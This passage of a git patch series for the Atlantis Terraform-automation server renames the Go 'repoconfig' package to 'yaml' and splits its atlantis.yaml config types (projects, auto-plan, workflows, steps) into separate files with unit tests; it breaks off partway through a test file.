server/events/yaml/config.go index acdc7a0ce6..3fffcf0135 100644 --- a/server/events/repoconfig/config.go +++ b/server/events/yaml/config.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/execution_planner.go b/server/events/yaml/execution_planner.go similarity index 95% rename from server/events/repoconfig/execution_planner.go rename to server/events/yaml/execution_planner.go index c94001925e..c349034004 100644 --- 
a/server/events/repoconfig/execution_planner.go +++ b/server/events/yaml/execution_planner.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" @@ -96,7 +96,9 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return steps, nil } } - return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace) + // They haven't defined this project, use the default workflow. + log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace) + return defaults, nil } func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { diff --git a/server/events/repoconfig/init_step.go b/server/events/yaml/init_step.go similarity index 97% rename from server/events/repoconfig/init_step.go rename to server/events/yaml/init_step.go index 022399c4fb..235b90244e 100644 --- a/server/events/repoconfig/init_step.go +++ b/server/events/yaml/init_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml // InitStep runs `terraform init`. type InitStep struct { diff --git a/server/events/repoconfig/init_step_test.go b/server/events/yaml/init_step_test.go similarity index 92% rename from server/events/repoconfig/init_step_test.go rename to server/events/yaml/init_step_test.go index 1996e18d18..bfdbd84b5f 100644 --- a/server/events/repoconfig/init_step_test.go +++ b/server/events/yaml/init_step_test.go @@ -1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "testing" @@ -6,9 +6,9 @@ import ( "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := repoconfig.InitStep{ - Meta: repoconfig.StepMeta{ + s := yaml.InitStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", diff --git a/server/events/repoconfig/plan_step.go b/server/events/yaml/plan_step.go similarity index 99% rename from server/events/repoconfig/plan_step.go rename to server/events/yaml/plan_step.go index 6e7df0db0b..99890e62ea 100644 --- a/server/events/repoconfig/plan_step.go +++ b/server/events/yaml/plan_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/plan_step_test.go b/server/events/yaml/plan_step_test.go similarity index 95% rename from server/events/repoconfig/plan_step_test.go rename to server/events/yaml/plan_step_test.go index 7e9e8b1f22..91e9372d37 100644 --- a/server/events/repoconfig/plan_step_test.go +++ b/server/events/yaml/plan_step_test.go @@ -1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "errors" @@ -10,9 +10,9 @@ import ( "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: 
repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := repoconfig.PlanStep{ - Meta: repoconfig.StepMeta{ + s := yaml.PlanStep{ + Meta: yaml.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, diff --git a/server/events/repoconfig/reader.go b/server/events/yaml/reader.go similarity index 93% rename from server/events/repoconfig/reader.go rename to server/events/yaml/reader.go index 7f2557e42d..1708e40ff9 100644 --- a/server/events/repoconfig/reader.go +++ b/server/events/yaml/reader.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" @@ -46,8 +46,8 @@ func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { // Unmarshal error messages aren't fit for user output. We need to // massage them. - // todo: fix "field autoplan not found in struct repoconfig.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1)) + // todo: fix "field autoplan not found in struct yaml.alias" errors + return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1)) } // Validate version. 
diff --git a/server/events/repoconfig/reader_test.go b/server/events/yaml/reader_test.go similarity index 85% rename from server/events/repoconfig/reader_test.go rename to server/events/yaml/reader_test.go index 02fa41b342..430b4d98d5 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/yaml/reader_test.go @@ -1,16 +1,16 @@ -package repoconfig_test +package yaml_test import ( "io/ioutil" "path/filepath" "testing" - "github.com/runatlantis/atlantis/server/events/repoconfig" + "github.com/runatlantis/atlantis/server/events/yaml" . "github.com/runatlantis/atlantis/testing" ) func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := repoconfig.Reader{} + r := yaml.Reader{} conf, err := r.ReadConfig("/not/exist") Ok(t, err) Assert(t, conf == nil, "exp nil ptr") @@ -20,7 +20,7 @@ func TestReadConfig_FileDoesNotExist(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - r := repoconfig.Reader{} + r := yaml.Reader{} conf, err := r.ReadConfig(tmpDir) Ok(t, err) Assert(t, conf == nil, "exp nil ptr") @@ -32,7 +32,7 @@ func TestReadConfig_BadPermissions(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrContains(t, "unable to read atlantis.yaml file: ", err) } @@ -64,7 +64,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { t.Run(c.description, func(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, c.expErr, err) }) @@ -159,7 +159,7 @@ projects: version: 2 projects: - unknown: value`, - expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", }, // project workflow doesn't exist @@ -303,6 +303,30 @@ workflows: default: plan: - init 
+`, + expErr: "missing \"steps\" key", + }, + { + description: "no value after plan:", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: +`, + expErr: "missing \"steps\" key", + }, + { + description: "no value after apply:", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: `, expErr: "missing \"steps\" key", }, @@ -316,7 +340,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) }) @@ -324,9 +348,9 @@ workflows: } func TestReadConfig_Successes(t *testing.T) { - basicProjects := []repoconfig.Project{ + basicProjects := []yaml.Project{ { - AutoPlan: &repoconfig.AutoPlan{ + AutoPlan: &yaml.AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, }, @@ -341,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) { cases := []struct { description string input string - expOutput repoconfig.RepoConfig + expOutput yaml.RepoConfig }{ { description: "uses project defaults", @@ -349,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) { version: 2 projects: - dir: "."`, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -363,7 +387,7 @@ projects: auto_plan: when_modified: ["**/*.tf"] `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -375,7 +399,7 @@ version: 2 projects: - dir: "." `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -388,7 +412,7 @@ projects: - dir: "." 
workflows: ~ `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, }, @@ -402,13 +426,13 @@ projects: workflows: default: ~ `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -417,8 +441,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "apply", }, @@ -439,13 +463,13 @@ workflows: plan: apply: `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -454,8 +478,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "apply", }, @@ -478,15 +502,15 @@ workflows: apply: steps: `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ + Plan: &yaml.Stage{ Steps: nil, }, - Apply: &repoconfig.Stage{ + Apply: &yaml.Stage{ Steps: nil, }, }, @@ -510,13 +534,13 @@ workflows: - plan # we don't validate if they make sense - apply `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ 
+ Steps: []yaml.StepConfig{ { StepType: "init", }, @@ -525,8 +549,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "plan", }, @@ -562,13 +586,13 @@ workflows: - apply: extra_args: ["a", "b"] `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "init", ExtraArgs: nil, @@ -579,8 +603,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "plan", ExtraArgs: []string{"a", "b"}, @@ -610,13 +634,13 @@ workflows: steps: - run: echo apply "arg 2" `, - expOutput: repoconfig.RepoConfig{ + expOutput: yaml.RepoConfig{ Version: 2, Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ + Workflows: map[string]yaml.Workflow{ "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "run", ExtraArgs: nil, @@ -624,8 +648,8 @@ workflows: }, }, }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ { StepType: "run", ExtraArgs: nil, @@ -647,7 +671,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := repoconfig.Reader{} + r := yaml.Reader{} act, err := r.ReadConfig(tmpDir) Ok(t, err) Equals(t, &c.expOutput, act) diff --git a/server/events/repoconfig/repoconfig.go b/server/events/yaml/repoconfig.go similarity index 99% rename from server/events/repoconfig/repoconfig.go rename to server/events/yaml/repoconfig.go index 6d71d7de0d..7af982436b 100644 --- a/server/events/repoconfig/repoconfig.go +++ 
b/server/events/yaml/repoconfig.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "github.com/hashicorp/go-version" diff --git a/server/events/repoconfig/run_step.go b/server/events/yaml/run_step.go similarity index 97% rename from server/events/repoconfig/run_step.go rename to server/events/yaml/run_step.go index 7a157bb6fb..e4794a22ce 100644 --- a/server/events/repoconfig/run_step.go +++ b/server/events/yaml/run_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go new file mode 100644 index 0000000000..d00e3ec788 --- /dev/null +++ b/server/events/yaml/run_step_test.go @@ -0,0 +1,3 @@ +package yaml + +// todo diff --git a/server/server.go b/server/server.go index e53de94a11..9381d74690 100644 --- a/server/server.go +++ b/server/server.go @@ -36,11 +36,11 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" "github.com/runatlantis/atlantis/server/static" "github.com/urfave/cli" @@ -200,8 +200,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &repoconfig.ExecutionPlanner{ - ConfigReader: &repoconfig.Reader{}, + executionPlanner := &yaml.ExecutionPlanner{ + ConfigReader: &yaml.Reader{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, } From b531705429ed48b698df0ba2182e7a04e017618f Mon Sep 17 00:00:00 2001 
From: Luke Kysow Date: Fri, 8 Jun 2018 15:55:55 +0100 Subject: [PATCH 14/69] Split out config elements into separate files --- server/events/yaml/auto_plan.go | 10 ++ server/events/yaml/auto_plan_test.go | 47 ++++++ server/events/yaml/config.go | 206 +------------------------ server/events/yaml/config_test.go | 74 +++++++++ server/events/yaml/project.go | 28 ++++ server/events/yaml/project_test.go | 67 ++++++++ server/events/yaml/reader.go | 8 +- server/events/yaml/reader_test.go | 22 +-- server/events/yaml/stage.go | 5 + server/events/yaml/step_config.go | 82 ++++++++++ server/events/yaml/step_config_test.go | 159 +++++++++++++++++++ server/events/yaml/workflow.go | 60 +++++++ server/events/yaml/workflow_test.go | 123 +++++++++++++++ 13 files changed, 671 insertions(+), 220 deletions(-) create mode 100644 server/events/yaml/auto_plan.go create mode 100644 server/events/yaml/auto_plan_test.go create mode 100644 server/events/yaml/config_test.go create mode 100644 server/events/yaml/project.go create mode 100644 server/events/yaml/project_test.go create mode 100644 server/events/yaml/stage.go create mode 100644 server/events/yaml/step_config.go create mode 100644 server/events/yaml/step_config_test.go create mode 100644 server/events/yaml/workflow.go create mode 100644 server/events/yaml/workflow_test.go diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go new file mode 100644 index 0000000000..16bcb80f5b --- /dev/null +++ b/server/events/yaml/auto_plan.go @@ -0,0 +1,10 @@ +package yaml + +type AutoPlan struct { + WhenModified []string `yaml:"when_modified"` + Enabled bool `yaml:"enabled"` +} + +// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set +// defaults for bool and []string fields and so we just use the normal yaml +// unmarshalling. 
diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go new file mode 100644 index 0000000000..2dd8a43ef9 --- /dev/null +++ b/server/events/yaml/auto_plan_test.go @@ -0,0 +1,47 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestAutoPlan_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.AutoPlan + }{ + { + description: "should use defaults", + input: ` +`, + exp: yaml.AutoPlan{ + Enabled: false, + WhenModified: nil, + }, + }, + { + description: "should use all set fields", + input: ` +enabled: true +when_modified: ["something-else"] +`, + exp: yaml.AutoPlan{ + Enabled: true, + WhenModified: []string{"something-else"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a yaml.AutoPlan + err := yamlv2.Unmarshal([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go index 3fffcf0135..cd8c4f26eb 100644 --- a/server/events/yaml/config.go +++ b/server/events/yaml/config.go @@ -1,211 +1,7 @@ package yaml -import ( - "fmt" - - "github.com/flynn-archive/go-shlex" - "github.com/pkg/errors" -) - -type RepoConfig struct { +type Config struct { Version int `yaml:"version"` Projects []Project `yaml:"projects"` Workflows map[string]Workflow `yaml:"workflows"` } - -type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` -} - -func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Project - // Set up defaults. 
- defaults := alias{ - Workspace: defaultWorkspace, - AutoPlan: &AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *p = Project(defaults) - return nil -} - -type AutoPlan struct { - WhenModified []string `yaml:"when_modified"` - Enabled bool `yaml:"enabled"` // defaults to true -} - -func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias AutoPlan - // Set up defaults. - defaults := alias{ - // If not specified, we assume it's enabled. - Enabled: true, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *a = AutoPlan(defaults) - return nil -} - -type Workflow struct { - Apply *Stage `yaml:"apply"` // defaults to regular apply steps - Plan *Stage `yaml:"plan"` // defaults to regular plan steps -} - -func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Check if they forgot to set the "steps" key. - type MissingSteps struct { - Apply []interface{} - Plan []interface{} - } - var missingSteps MissingSteps - if err := unmarshal(&missingSteps); err == nil { - return errors.New("missing \"steps\" key") - } - - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Workflow - var tmp alias - if err := unmarshal(&tmp); err != nil { - return err - } - *p = Workflow(tmp) - - // If plan or apply keys aren't specified we use the default workflow. 
- if p.Apply == nil { - p.Apply = &Stage{ - []StepConfig{ - { - StepType: "apply", - }, - }, - } - } - - if p.Plan == nil { - p.Plan = &Stage{ - []StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - } - } - - return nil -} - -type Stage struct { - Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' -} - -type StepConfig struct { - StepType string - ExtraArgs []string - // Run will be set if the StepType is "run". This is for custom commands. - // Ex. if the key is `run: echo hi` then Run will be "echo hi". - Run []string -} - -func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. - // steps: - // - init - // - plan - var singleString string - err := unmarshal(&singleString) - if err == nil { - if singleString != "init" && singleString != "plan" && singleString != "apply" { - return fmt.Errorf("unsupported step type: %q", singleString) - } - s.StepType = singleString - return nil - } - - // Next, try to unmarshal as a built-in command with extra_args set, ex. - // steps: - // - init: - /// extra_args: ["arg1"] - // - // We need to create a struct for each step so go-yaml knows to call into - // our routine based on the key (ex. init, plan, etc). - // We use a map[string]interface{} as the value so we can manually - // validate key names and return better errors. 
This is instead of: - // Init struct{ - // ExtraArgs []string `yaml:"extra_args"` - // } `yaml:"init"` - - validateBuiltIn := func(stepType string, args map[string]interface{}) error { - s.StepType = stepType - for k, v := range args { - if k != "extra_args" { - return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType) - } - - // parse as []string - val, ok := v.([]interface{}) - if !ok { - return fmt.Errorf("expected array of strings as value of extra_args, not %q", v) - } - var finalVals []string - for _, i := range val { - finalVals = append(finalVals, fmt.Sprintf("%s", i)) - } - s.ExtraArgs = finalVals - } - return nil - } - var initStep struct { - Init map[string]interface{} `yaml:"init"` - } - if err = unmarshal(&initStep); err == nil { - return validateBuiltIn("init", initStep.Init) - } - - var planStep struct { - Plan map[string]interface{} `yaml:"plan"` - } - if err = unmarshal(&planStep); err == nil { - return validateBuiltIn("plan", planStep.Plan) - } - - var applyStep struct { - Apply map[string]interface{} `yaml:"apply"` - } - if err = unmarshal(&applyStep); err == nil { - return validateBuiltIn("apply", applyStep.Apply) - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - var runStep struct { - Run string `yaml:"run"` - } - if err = unmarshal(&runStep); err == nil { - s.StepType = "run" - parts, err := shlex.Split(runStep.Run) - if err != nil { - return err - } - s.Run = parts - } - - return err -} diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go new file mode 100644 index 0000000000..df4bc9c541 --- /dev/null +++ b/server/events/yaml/config_test.go @@ -0,0 +1,74 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . 
"github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Config + }{ + { + description: "should be empty if nothing set", + input: `~`, + exp: yaml.Config{ + Version: 0, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: yaml.Config{ + Version: 2, + Projects: []yaml.Project{ + { + Dir: "mydir", + Workflow: "default", + Workspace: "myworkspace", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + Workflows: map[string]yaml.Workflow{ + "default": { + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf yaml.Config + err := yamlv2.Unmarshal([]byte(c.input), &conf) + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go new file mode 100644 index 0000000000..b2c136e59d --- /dev/null +++ b/server/events/yaml/project.go @@ -0,0 +1,28 @@ +package yaml + +type Project struct { + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` +} + +func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Project + // Set up defaults. 
+ defaults := alias{ + Workspace: defaultWorkspace, + AutoPlan: &AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *p = Project(defaults) + return nil +} diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go new file mode 100644 index 0000000000..c3ab94d1db --- /dev/null +++ b/server/events/yaml/project_test.go @@ -0,0 +1,67 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestProject_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Project + }{ + { + description: "should use defaults", + input: ` +dir: .`, + exp: yaml.Project{ + Dir: ".", + Workspace: "default", + Workflow: "", + TerraformVersion: "", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + { + description: "should use all set fields", + input: ` +dir: mydir +workspace: workspace +workflow: workflow +terraform_version: v0.11.0 +auto_plan: + when_modified: [] + enabled: false +apply_requirements: +- mergeable`, + exp: yaml.Project{ + Dir: "mydir", + Workspace: "workspace", + Workflow: "workflow", + TerraformVersion: "v0.11.0", + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{}, + Enabled: false, + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var p yaml.Project + err := yamlv2.Unmarshal([]byte(c.input), &p) + Ok(t, err) + Equals(t, c.exp, p) + }) + } +} diff --git a/server/events/yaml/reader.go b/server/events/yaml/reader.go index 1708e40ff9..eaea835393 100644 --- a/server/events/yaml/reader.go +++ b/server/events/yaml/reader.go @@ -19,7 +19,7 @@ type Reader struct{} // ReadConfig returns the parsed and validated config for repoDir. 
// If there was no config, it returns a nil pointer. -func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { +func (r *Reader) ReadConfig(repoDir string) (*Config, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) @@ -41,13 +41,13 @@ func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { return &config, err } -func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { - var repoConfig RepoConfig +func (r *Reader) parseAndValidate(configData []byte) (Config, error) { + var repoConfig Config if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { // Unmarshal error messages aren't fit for user output. We need to // massage them. // todo: fix "field autoplan not found in struct yaml.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1)) + return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1)) } // Validate version. diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/reader_test.go index 430b4d98d5..7dc4b25b4c 100644 --- a/server/events/yaml/reader_test.go +++ b/server/events/yaml/reader_test.go @@ -365,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) { cases := []struct { description string input string - expOutput yaml.RepoConfig + expOutput yaml.Config }{ { description: "uses project defaults", @@ -373,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) { version: 2 projects: - dir: "."`, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -387,7 +387,7 @@ projects: auto_plan: when_modified: ["**/*.tf"] `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -399,7 +399,7 @@ version: 2 projects: - dir: "." `, - expOutput: yaml.RepoConfig{ + expOutput: 